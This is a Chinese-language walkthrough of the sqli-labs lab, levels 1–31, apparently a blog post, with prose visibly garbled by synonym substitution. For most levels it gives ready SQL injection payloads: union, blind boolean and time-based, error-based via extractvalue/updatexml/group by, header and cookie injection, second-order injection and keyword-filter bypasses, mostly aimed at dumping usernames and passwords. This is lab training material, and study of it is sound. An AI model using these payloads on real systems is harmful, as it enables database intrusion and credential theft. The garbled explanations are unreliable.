假如剛開端打仗sql注入，那么sqli-labs這個(gè)靶場(chǎng)會(huì)很合適你，外面包括了良多的情景，以及咱們?cè)趕ql注入的時(shí)間碰到的妨礙。本章將1-65關(guān)重點(diǎn)關(guān)卡停止具體講授。代碼基礎(chǔ)上很全。假如靶場(chǎng)訓(xùn)練完了能夠看我這篇SQL注入總結(jié)會(huì)更好控制。SQL注入十分具體總結(jié)_懵懂是福yyyy的博客-CSDN博客_sql注入數(shù)據(jù)包

mysql數(shù)據(jù)構(gòu)造

在訓(xùn)練靶場(chǎng)前咱們須要懂得以下mysql數(shù)據(jù)庫構(gòu)造，mysql數(shù)據(jù)庫5.0以上版本有一個(gè)自帶的數(shù)據(jù)庫叫做information_schema,該數(shù)據(jù)庫上面有兩個(gè)表一個(gè)是tables跟columns。tables這個(gè)表的table_name字段上面是全部數(shù)據(jù)庫存在的表名。table_schema字段下是全部表名對(duì)應(yīng)的數(shù)據(jù)庫名。columns這個(gè)表的colum_name字段下是全部數(shù)據(jù)庫存在的字段名。columns_schema字段下是全部表名對(duì)應(yīng)的數(shù)據(jù)庫。懂得這些對(duì)咱們之后去查問數(shù)占有很年夜輔助。咱們后面構(gòu)造講授比擬具體前面就比擬簡略了。?

1.sqli-labs第一關(guān)

1.1斷定能否存在sql注入

1.提醒你輸入數(shù)字值的ID作為參數(shù)，咱們輸入?id=1

2.經(jīng)由過程數(shù)字值差別前往的內(nèi)亂容也差別，以是咱們輸入的內(nèi)亂容是帶入到數(shù)據(jù)庫外面查問了。

3.接上去咱們斷定sql語句能否是拼接，且是字符型仍是數(shù)字型。

4.能夠依據(jù)成果指定是字符型且存在sql注入破綻。由于該頁面存在回顯，以是咱們能夠應(yīng)用結(jié)合查問。結(jié)合查問道理簡略說一下，結(jié)合查問就是兩個(gè)sql語句一同查問，兩張表存在雷同的列數(shù)，且字段名是一樣的。

2.2 結(jié)合注入

第一步：起首曉得表格有多少列，假如報(bào)錯(cuò)就是超越列數(shù)，假如表現(xiàn)畸形就是不超越列數(shù)。

####?id=1'order by 3 --+

第二步：爆出表現(xiàn)位，就是看看表格外面那一列是在頁面表現(xiàn)的。能夠看到是第二列跟第三列外面的數(shù)據(jù)是表現(xiàn)在頁面的。

####?id=-1'union select 1,2,3--+

第三步：獲取以后數(shù)據(jù)名跟版本號(hào)，這個(gè)就波及mysql數(shù)據(jù)庫的一些函數(shù)，記得就行。經(jīng)由過程成果曉得以后數(shù)據(jù)看是security,版本是5.7.26。

####?id=-1'union select 1,database(),version()--+

第四步： 爆表，information_schema.tables表現(xiàn)該數(shù)據(jù)庫下的tables表，點(diǎn)表現(xiàn)下一級(jí)。where前面是前提，group_concat()是將查問到成果銜接起來。假如不必group_concat查問到的只有user。該語句的意思是查問information_schema數(shù)據(jù)庫下的tables內(nèi)外面且table_schema字段內(nèi)亂容是security的全部table_name的內(nèi)亂容。也就是上面表格user跟passwd。

####?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?第五步：爆字段名，咱們經(jīng)由過程sql語句查問曉得以后數(shù)據(jù)庫有四個(gè)表，依據(jù)表名曉得可能用戶的賬戶跟暗碼是在users表中。接上去咱們就是失掉該表下的字段名以及內(nèi)亂容。

該語句的意思是查問information_schema數(shù)據(jù)庫下的columns內(nèi)外面且table_users字段內(nèi)亂容是users的全部column_name的內(nèi)亂。留神table_name字段不是只存在于tables表，也是存在columns表中。表現(xiàn)全部字段對(duì)應(yīng)的表名。

?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?第六步：經(jīng)由過程上述操縱能夠失掉兩個(gè)敏感字段就是username跟password,接上去咱們就要失掉該字段對(duì)應(yīng)的內(nèi)亂容。我本人加了一個(gè)id能夠隔一下賬戶跟暗碼。

?id=-1' union select 1,2,group_concat(username ,id , password) from users--+

2.sqli-labs第二關(guān)

跟第一關(guān)是一樣停止斷定，當(dāng)咱們輸入單引號(hào)或許雙引號(hào)能夠看到報(bào)錯(cuò)，且報(bào)錯(cuò)信息看不到數(shù)字，全部咱們能夠猜想sql語句應(yīng)當(dāng)是數(shù)字型注入。那步調(diào)跟咱們第一關(guān)是差未幾的，

####"SELECT * FROM users WHERE id=$id LIMIT 0,1" "SELECT * FROM users WHERE id=1 ' LIMIT 0,1"犯錯(cuò)信息。 ?id=1 order by 3 ?id=-1 union select 1,2,3 ?id=-1 union select 1,database(),version() ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' ?id=-1 union select 1,2,group_concat(username ,id , password) from users

3.sqli-labs第三關(guān)

當(dāng)咱們?cè)谳斎?id=2'的時(shí)間看到頁面報(bào)錯(cuò)信息。可揣摸sql語句是單引號(hào)字符型且有括號(hào)，以是咱們須要閉合單引號(hào)且也要斟酌括號(hào)。

經(jīng)由過程上面代碼構(gòu)建就能夠停止sql注入。前面全部代碼以此為基本停止結(jié)構(gòu)。

####?id=2')--+ ?id=1') order by 3--+ ?id=-1') union select 1,2,3--+ ?id=-1') union select 1,database(),version()--+ ?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1') union select 1,2,group_concat(username ,id , password) from users--+

4.sqli-labs第四關(guān)

依據(jù)頁面報(bào)錯(cuò)信息得悉sql語句是雙引號(hào)字符型且有括號(hào)，經(jīng)由過程以下代碼停止sql注入

####?id=1") order by 3--+ ?id=-1") union select 1,2,3--+ ?id=-1") union select 1,database(),version()--+ ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ ?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ ?id=-1") union select 1,2,group_concat(username ,id , password) from users--+

5.sqli-labs第五關(guān)

第五關(guān)依據(jù)頁面成果得悉是字符型然而跟后面四關(guān)仍是紛歧樣是由于頁面固然有貨色。然而只有對(duì)懇求對(duì)錯(cuò)呈現(xiàn)紛歧樣頁面其他的就不了。這個(gè)時(shí)間咱們用結(jié)合注入就不用，由于結(jié)合注入是須要頁面有回顯位。假如數(shù)據(jù) 不表現(xiàn)只有對(duì)錯(cuò)頁面表現(xiàn)咱們能夠抉擇布爾盲注。布爾盲注重要用到length(),ascii() ,substr()這三個(gè)函數(shù)，起首經(jīng)由過程length()函數(shù)斷定長度再經(jīng)由過程別的兩個(gè)斷定詳細(xì)字符是什么。布爾盲注向?qū)Y(jié)合注入來說須要破費(fèi)大批時(shí)光。

####?id=1'and length((select database()))>9--+ #年夜于號(hào)能夠換成小于號(hào)或許即是號(hào)，重要是斷定數(shù)據(jù)庫的長度。lenfth()是獲取以后數(shù)據(jù)庫名的長度。假如數(shù)據(jù)庫是haha那么length()就是4 ?id=1'and ascii(substr((select database()),1,1))=115--+ #substr("78909",1,1)=7 substr(a,b,c)a是要截取的字符串，b是截取的地位，c是截取的長度。布爾盲注咱們都是長度為1由于咱們要一個(gè)個(gè)斷定字符。ascii()是將截取的字符轉(zhuǎn)換成對(duì)應(yīng)的ascii嗎，如許咱們能夠很好斷定數(shù)字依據(jù)數(shù)字找到對(duì)應(yīng)的字符。 ?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+ 斷定全部表名字符長度。 ?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+ 逐個(gè)斷定表名 ?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+ 斷定全部字段名的長度 ?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+ 逐個(gè)斷定字段名。 ?id=1' and length((select group_concat(username,password) from users))>109--+ 斷定字段內(nèi)亂容長度 ?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+ 逐個(gè)檢測(cè)內(nèi)亂容。

6.sqli-labs第六關(guān)

第六關(guān)跟第五關(guān)是差未幾的，依據(jù)頁面報(bào)錯(cuò)信息能夠猜想id參數(shù)是雙引號(hào)，只要將第五關(guān)的單引號(hào)換成雙引號(hào)就能夠了。

7.sqli-labs第七關(guān)

第七關(guān)當(dāng)在輸入id=1,頁面表現(xiàn)you are in... 當(dāng)咱們輸入id=1'時(shí)表現(xiàn)報(bào)錯(cuò)，然而不報(bào)錯(cuò)信息，這跟咱們之前的關(guān)卡紛歧樣，之前都有報(bào)錯(cuò)信息。當(dāng)咱們輸入id=1"時(shí)表現(xiàn)畸形以是咱們能夠判斷參數(shù)id時(shí)單引號(hào)字符串。由于單引號(hào)損壞了他原有語法構(gòu)造。而后我輸入id=1'--+時(shí)報(bào)錯(cuò)，這時(shí)間咱們能夠輸入id=1')--+發(fā)明仍然報(bào)錯(cuò)，之時(shí)我嘗嘗是不是雙括號(hào)輸入id=1'))--+，發(fā)明頁面表現(xiàn)畸形。那么它的過關(guān)伎倆跟后面就一樣了抉擇布爾盲注就能夠了。

8.sqli-labs第八關(guān)

第八關(guān)跟第五關(guān)一樣就未幾說了。只不外第八關(guān)不報(bào)錯(cuò)信息，然而有you are in..停止參照。id參數(shù)是一個(gè)單引號(hào)字符串。

9.sqli-labs第九關(guān)

第九關(guān)會(huì)發(fā)明咱們不論輸入什么頁面表現(xiàn)的貨色都是一樣的，這個(gè)時(shí)間布爾盲注就不合適咱們用，布爾盲注合適頁面臨于過錯(cuò)跟準(zhǔn)確成果有差別反映。假如頁面始終穩(wěn)定這個(gè)時(shí)間咱們能夠應(yīng)用時(shí)光注入，時(shí)光注入跟布爾盲注兩種不多年夜差異只不外時(shí)光盲注多了if函數(shù)跟sleep()函數(shù)。if(a,sleep(10),1)假如a成果是真的，那么履行sleep(10)頁面耽誤10秒，假如a的成果是假，履行1，頁面不耽誤。經(jīng)由過程頁面時(shí)光來斷定出id參數(shù)是單引號(hào)字符串。

####?id=1' and if(1=1,sleep(5),1)--+ 斷定參數(shù)結(jié)構(gòu)。 ?id=1'and if(length((select database()))>9,sleep(5),1)--+ 斷定數(shù)據(jù)庫名長度 ?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+ 逐個(gè)斷定數(shù)據(jù)庫字符 ?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+ 斷定全部表名長度 ?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+ 逐個(gè)斷定表名 ?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+ 斷定全部字段名的長度 ?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+ 逐個(gè)斷定字段名。 ?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+ 斷定字段內(nèi)亂容長度 ?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+ 逐個(gè)檢測(cè)內(nèi)亂容。

10.sqli-labs第十關(guān)

第十關(guān)跟第九關(guān)一樣只要要將單引號(hào)換成雙引號(hào)。

11.sqli-labs第十一關(guān)

從第十一關(guān)開端，能夠發(fā)明頁面就產(chǎn)生變更了，是賬戶登錄頁面。那么注入點(diǎn)就在輸入框外面。前十關(guān)應(yīng)用的是get懇求，參數(shù)都表現(xiàn)在url下面，而從十一關(guān)開端是post懇求，參數(shù)是在表單外面。咱們能夠直接在輸入框停止注入就行。而且參數(shù)不在是一個(gè)仍是兩個(gè)。依據(jù)后面的意識(shí)咱們能夠猜想sql語句。大略的情勢(shì)應(yīng)當(dāng)是如許username=參數(shù) and password=參數(shù) ，只是不曉得是字符型仍是整數(shù)型。

當(dāng)咱們輸入1時(shí)呈現(xiàn)過錯(cuò)圖片

當(dāng)咱們輸入1',呈現(xiàn)報(bào)錯(cuò)信息。依據(jù)報(bào)錯(cuò)信息能夠揣摸該sql語句username='參數(shù)' and password='參數(shù)'

?曉得sql語句咱們能夠結(jié)構(gòu)一個(gè)恒建立的sql語句，看的查問出什么。這里咱們應(yīng)用--+解釋就不可，須要換成#來解釋， 這個(gè)就跟咱們第一關(guān)是一樣了。應(yīng)用結(jié)合注入就能夠獲取數(shù)據(jù)庫信息。

12.sqli-labs第十二關(guān)

當(dāng)咱們輸入1'跟1時(shí)間頁面不反映

當(dāng)咱們輸入1"的時(shí)間頁面呈現(xiàn)報(bào)錯(cuò)信息，就能夠曉得sql語句是雙引號(hào)且有括號(hào)。

?那么咱們能夠結(jié)構(gòu)上面語句停止sql注入。

1" ) or 1=1 #斷定能否存在sql注入。 1" ) union select 1,2#

13.sqli-labs第十三關(guān)

十三關(guān)跟十二關(guān)差未幾，只要要將雙引號(hào)換成單引號(hào)。

14.sqli-labs第十四關(guān)

十四關(guān)跟十一關(guān)差未幾，只要要將單引號(hào)換成雙引號(hào)。

15.sqli-labs第十五關(guān)

第十五關(guān)跟第十一關(guān)一樣，只是不發(fā)生報(bào)錯(cuò)信息。這就是顯明的布爾盲注。由于另有過錯(cuò)頁面跟準(zhǔn)確頁面停止參考。

16.sqli-labs第十六關(guān)

第十六關(guān)跟十二關(guān)一樣，須要布爾盲注。

17.sqli-labs第十七關(guān)

第十七關(guān)跟后面的關(guān)有很年夜紛歧樣，依據(jù)頁面展現(xiàn)是一個(gè)暗碼重置頁面，也就是說咱們?cè)?jīng)登錄體系了，而后檢查咱們?cè)创a，是依據(jù)咱們供給的賬戶名去數(shù)據(jù)庫檢查用戶名跟暗碼，假如賬戶名準(zhǔn)確那么將暗碼改成你輸入的暗碼。再履行這條sql語句之前會(huì)對(duì)輸入的賬戶名停止檢討，對(duì)輸入的特別字符本義。以是咱們可能應(yīng)用的只有更新暗碼的sql語句。sql語句之前都是查問，這里有一個(gè)update更新數(shù)據(jù)庫外面信息。以是之前的結(jié)合注入跟布爾盲注以實(shí)時(shí)間盲注都不克不及用了。這里咱們會(huì)用到報(bào)錯(cuò)注入。用到三種mysql報(bào)錯(cuò)注入，上面都給各人具體寫出步調(diào),各人能夠鑒戒。

這里先容的報(bào)錯(cuò)注入能夠抉擇extractvalue()報(bào)錯(cuò)注入，updatexml()報(bào)錯(cuò)注入跟group by()報(bào)錯(cuò)注入。上面簡略說一下者三種報(bào)錯(cuò)注入的道理。

extractvalue報(bào)錯(cuò)注入

extractvalue(XML_document,XPath_string)

第一個(gè)參數(shù)：XML_document是String格局，為XML文檔工具的稱號(hào)，文中為Doc

第二個(gè)參數(shù)：XPath_string (Xpath格局的字符串) ，假如不懂得Xpath語法，能夠在網(wǎng)上查找教程。

感化：從XML_document中提取合乎XPATH_string的值，當(dāng)咱們XPath_string語法報(bào)錯(cuò)時(shí)間就會(huì)報(bào)錯(cuò)，上面的語法就是過錯(cuò)的。concat跟我后面說的的group_concat感化一樣

上面已將該報(bào)錯(cuò)注入代碼給到各人，在最后一步爆字段內(nèi)亂容時(shí)間，會(huì)報(bào)錯(cuò)，起因是mysql數(shù)據(jù)不支撐查問跟更新是統(tǒng)一張表。以是咱們須要加一其中間表。這個(gè)關(guān)卡須要輸入準(zhǔn)確賬號(hào)由于是暗碼重置頁面，以是爆出的是該賬戶的原始暗碼。假如查問時(shí)不是users表就不會(huì)報(bào)錯(cuò)。

1' and (extractvalue(1,concat(0x5c,version(),0x5c)))# 爆版本 1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 爆數(shù)據(jù)庫 1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 爆表名 1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))# 爆字段名 1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))# 爆字段內(nèi)亂容該格局針對(duì)mysql數(shù)據(jù)庫。 1' and (extractvalue(1,concat(0x5c,(select group_concat(username,password) from users),0x5c)))# 爆字段內(nèi)亂容。

updatexml報(bào)錯(cuò)注入

UPDATEXML (XML_document, XPath_string, new_value)

第一個(gè)參數(shù)：XML_document是String格局，為XML文檔工具的稱號(hào)，文中為Doc

第二個(gè)參數(shù)：XPath_string (Xpath格局的字符串) ，假如不懂得Xpath語法，能夠在網(wǎng)上查找教程。

第三個(gè)參數(shù)：new_value，String格局，調(diào)換查找到的合乎前提的數(shù)據(jù)

感化：轉(zhuǎn)變文檔中合乎前提的節(jié)點(diǎn)的值，轉(zhuǎn)變XML_document中合乎XPATH_string的值

當(dāng)咱們XPath_string語法報(bào)錯(cuò)時(shí)間就會(huì)報(bào)錯(cuò)，updatexml()報(bào)錯(cuò)注入跟extractvalue()報(bào)錯(cuò)注入基礎(chǔ)差未幾。

上面已將該報(bào)錯(cuò)注入代碼給到各人，最后爆字段跟下面一樣假如加一其中間表。

####123' and (updatexml(1,concat(0x5c,version(),0x5c),1))# 爆版本 123' and (updatexml(1,concat(0x5c,database(),0x5c),1))# 爆數(shù)據(jù)庫 123' and (updatexml(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c),1))# 爆表名 123' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='users'),0x5c),1))# 爆字段名 123' and (updatexml(1,concat(0x5c,(select password from (select password from users where username='admin1') b),0x5c),1))# 爆暗碼該格局針對(duì)mysql數(shù)據(jù)庫。 爆其余表就能夠，上面是爆emails表 123' and (updatexml(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name ='emails'),0x5c),1))# 1' and (updatexml (1,concat(0x5c,(select group_concat(id,email_id) from emails),0x5c),1))# 爆字段內(nèi)亂容。

group by報(bào)錯(cuò)注入

group by 報(bào)錯(cuò)能夠看這個(gè)文章，此文章博主寫的很明白。這個(gè)報(bào)錯(cuò)注入比后面兩個(gè)龐雜一點(diǎn)。

####123' and (select count(*) from information_schema.tables group by concat(database(),0x5c,floor(rand(0)*2)))# 爆數(shù)據(jù)庫 123' and (select count(*) from information_schema.tables group by concat(version(),0x5c,floor(rand(0)*2)))# 爆數(shù)據(jù)庫版本 1' and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand(0)*2)))# 經(jīng)由過程修正limit前面數(shù)字一個(gè)一個(gè)爆表 1' and (select count(*) from information_schema.tables where table_schema=database() group by concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)))# 爆出全部表 1' and (select count(*) from information_schema.columns where table_schema=database() group by concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e,floor(rand(0)*2)))# 爆出全部字段名 1' and (select count(*) from information_schema.columns group by concat(0x7e,(select group_concat(username,password) from users),0x7e,floor(rand(0)*2)))# 爆出全部字段名 1' and (select 1 from(select count(*) from information_schema.columns where table_schema=database() group by concat(0x7e,(select password from users where username='admin1'),0x7e,floor(rand(0)*2)))a)# 爆出該賬戶的暗碼。

18.sqli-labs第十八關(guān)

這關(guān)咱們直接看到看到頁面有一個(gè)ip,咱們 能夠簡略看一下源碼，發(fā)明對(duì)輸入的賬戶名跟暗碼都有停止檢討，然而往下看會(huì)發(fā)明一個(gè)拔出的sql語句，當(dāng)咱們輸入爭(zhēng)奪的賬戶名跟暗碼咱們的User-Agent字段內(nèi)亂容就會(huì)呈現(xiàn)在頁面上。以是能夠從這下面下工夫

當(dāng)咱們?cè)赨ser-Agent前面加上單引號(hào)呈現(xiàn)如下報(bào)錯(cuò)，可見拔出語句是將ua字段內(nèi)亂容跟ip地點(diǎn)以及賬戶名作為字符串停止拔出且表面有括號(hào)。還要留神該拔出語句須要三個(gè)參數(shù)，以是咱們?cè)诮Y(jié)構(gòu)時(shí)間也須要有三個(gè)參數(shù)。由于#號(hào)前面都被解釋了。

?以是咱們能夠結(jié)構(gòu)如下數(shù)據(jù)，頁面表現(xiàn)畸形。能夠?qū)⑵溆鄥?shù)換成sql語句停止報(bào)錯(cuò)注入

?各人能夠本人報(bào)錯(cuò)注入方法停止注入，updatexml跟extractvalue報(bào)錯(cuò)注入爆出來的數(shù)據(jù)長度是無限的。

####1' ,2, (extractvalue(1,concat(0x5c,(select group_concat(password,username) from users),0x5c)))# 爆賬戶暗碼。 1',2,updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# 爆賬戶暗碼。

19.sqli-labs第十九關(guān)

十九關(guān)當(dāng)咱們輸入準(zhǔn)確的賬戶暗碼咱們的referer字段內(nèi)亂容會(huì)表現(xiàn)在頁面上。該拔出的sql語句有兩個(gè)參數(shù)一個(gè)是referfer,另有ip地點(diǎn)。上面代碼能夠報(bào)錯(cuò)賬戶暗碼。后面的各人本人結(jié)構(gòu)了。

####1',updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))#

20.sqli-labs第二十關(guān)

第二十關(guān)當(dāng)咱們輸入準(zhǔn)確頁面時(shí)間cookie字段表現(xiàn)在頁面上，停止抓包。停止注入

####'and updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1)#

?21.sqli-labs第二十一關(guān)

第二十一關(guān)跟二十關(guān)很像，獨(dú)一紛歧樣就是cookie那里不是賬戶名而是一串字符。有點(diǎn)教訓(xùn)就曉得是base64編碼，以是咱們能夠?qū)我?hào)停止編碼jw==能夠發(fā)明報(bào)錯(cuò)而且還得有括號(hào)。

?

將注入代碼停止編碼，能夠看到爆出賬戶暗碼。

####')and updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1)#

22.sqli-labs第二十二關(guān)

第二十二關(guān)跟第二十一關(guān)一樣只不外cookie是雙引號(hào)base64編碼，不括號(hào)。

23.sqli-labs第二十三關(guān)

第二十三關(guān)從新回到get懇求，會(huì)發(fā)明輸入單引號(hào)報(bào)錯(cuò)，然而解釋符不論用。猜想解釋符被過濾，看起源碼果真被解釋了，以是咱們能夠用單引號(hào)閉合，發(fā)明勝利。之后能夠應(yīng)用結(jié)合注入。不外在斷定列數(shù)時(shí)間不克不及應(yīng)用order by 去斷定須要用?id=-1' union select 1,2,3,4 or '1'='1經(jīng)由過程不絕加數(shù)字?jǐn)喽ㄗ詈笠罁?jù)頁面表現(xiàn)是三列，且表現(xiàn)位是2號(hào)。

####?id=1' or '1'='1 如許sql語句就釀成 id='1' or '1'='1' ?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1 ?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),3 or '1'='1 ?id=-1' union select 1,(select group_concat(password,username) from users),3 or '1'='1

24.sqli-labs第二十四關(guān)

第二十四關(guān)有一個(gè)登錄頁面跟注冊(cè)頁面還要一個(gè)修正暗碼頁面，該關(guān)卡應(yīng)用得是二次注入，由于登錄頁面跟注冊(cè)頁面臨于暗碼跟賬戶名都應(yīng)用mysql_real_escape_string函數(shù)對(duì)特別字符停止本義。這里咱們應(yīng)用的是注冊(cè)頁面，由于固然存在函數(shù)對(duì)特別字符停止本義，但只是在挪用sql語句時(shí)間停止本義，當(dāng)注冊(cè)勝利后賬戶暗碼存在到數(shù)據(jù)庫的時(shí)間是不本義的，以底本數(shù)據(jù)存入數(shù)據(jù)庫的。當(dāng)咱們修正暗碼的時(shí)間，對(duì)賬戶名是不停止過濾的。

起首咱們看到治理員賬戶，admin，暗碼是1,然而平日情形下咱們是不曉得暗碼的，只能猜想治理員賬戶的admin。咱們先注冊(cè)一個(gè)賬號(hào)名叫admin'#。

咱們先注冊(cè)一個(gè)賬號(hào)名叫admin'#。能夠看到咱們勝利將有傳染的數(shù)據(jù)寫入數(shù)據(jù)庫。單引號(hào)是為了跟之后暗碼修的用戶名的單引號(hào)停止閉合，#是為了解釋前面的數(shù)據(jù)。

之后也用戶名admin'#跟暗碼是123456登錄，進(jìn)入修正暗碼頁面。原始暗碼輸入123456，新暗碼我輸入的是111111，能夠看到暗碼修正勝利。

當(dāng)咱們數(shù)據(jù)庫檢查的時(shí)間發(fā)明修正的是治理員的暗碼。而不是咱們的注冊(cè)賬戶的暗碼。

25.sqli-labs第二十五關(guān)

第二十五關(guān)依據(jù)提醒是將or跟and這兩個(gè)調(diào)換成空，然而只調(diào)換一次。巨細(xì)寫繞過不用。咱們能夠采取雙寫繞過。本次關(guān)卡應(yīng)用結(jié)合注入就能夠了，information外面波及or能夠?qū)懗蒳nfoorrmation。

####?id=-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security'--+

26.sqli-labs第二十六關(guān)

第二十六關(guān)將邏輯運(yùn)算符，解釋符以及空格給過濾了，咱們須要應(yīng)用單引號(hào)停止閉合，雙寫繞過邏輯運(yùn)算符或許應(yīng)用&&跟||調(diào)換。空格繞過網(wǎng)上找了些材料，對(duì)繞過空格限度有年夜把的方法對(duì)空格，有較多的方式：%09 TAB鍵（程度）、%0a 新建一行、%0c 新的一頁、%0d return功效、%0b TAB鍵（垂直）、%a0 空格，我在windows跟kali外面都用不了，可能是由于apache剖析不了。只能應(yīng)用()繞過。報(bào)錯(cuò)注入空格應(yīng)用比擬少以是咱們能夠應(yīng)用報(bào)錯(cuò)注入。

####?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0 爆表 ?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'0 爆字段 ?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0 爆暗碼賬戶

26-a.sqli-labs第二十六-a關(guān)

該關(guān)卡跟二十六關(guān)差未幾，多了一個(gè)括號(hào)。不克不及應(yīng)用報(bào)錯(cuò)注入，該頁面不表現(xiàn)報(bào)錯(cuò)信息。須要應(yīng)用結(jié)合注入跟盲注。

27.sqli-labs第二十七關(guān)

二十七關(guān)跟二十六差未幾不外二十七關(guān)不過濾and跟or,過濾了select跟union,咱們能夠巨細(xì)寫繞過以及重寫繞過。

####?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))or'0 爆表 ?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))or'0 爆字段 ?id=1'or(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))or'0 爆暗碼賬戶

27-a.sqli-labs第二十七-a關(guān)

該關(guān)是雙引號(hào)且頁面不表現(xiàn)報(bào)錯(cuò)信息。過濾規(guī)矩跟二十七關(guān)一樣。以是咱們須要應(yīng)用盲注跟結(jié)合注入。

####?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1 ###?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,username)from%0Ausers%0Aand"1 ?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

28.sqli-labs第二十八關(guān)

該關(guān)卡過濾了解釋符空格還過濾了union跟select。\s表現(xiàn)空格，+表現(xiàn)婚配一次或?qū)掖危?i表現(xiàn)不辨別巨細(xì)寫，以是團(tuán)體表現(xiàn)婚配 union加一個(gè)或多個(gè)空格加select，此中union跟select不辨別巨細(xì)。以是咱們能夠應(yīng)用重寫繞過寫。

####?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(password,username)from%0Ausers%0Aand%0A('1

28-a.sqli-labs第二十八-A關(guān)

該關(guān)卡只過濾union+select。其余不過濾。

?id=0')uniunion selecton select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+

29.sqli-labs第二十九關(guān)

二十九關(guān)就是會(huì)對(duì)輸入的參數(shù)停止校驗(yàn)?zāi)芊駷閿?shù)字，然而在對(duì)參數(shù)值停止校驗(yàn)之前的提取時(shí)間只提取了第一個(gè)id值，假如咱們有兩個(gè)id參數(shù)，第一個(gè)id參數(shù)畸形數(shù)字，第二個(gè)id參數(shù)停止sql注入。sql語句在接收雷同參數(shù)時(shí)間接收的是前面的參數(shù)值。

####?id=1&id=-2%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=1&id=-2%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段 ?id=1&id=-2%27%20union%20select%201,group_concat(password,username),3%20from%20users--+ 爆暗碼賬戶

30.sqli-labs第三十關(guān)

三十關(guān)跟二十九關(guān)差未幾，將單引號(hào)換成雙引號(hào)

####?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段 ?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

31.sqli-labs第三十一關(guān)

三十一關(guān)跟三十關(guān)差未幾，多了一個(gè)括號(hào)

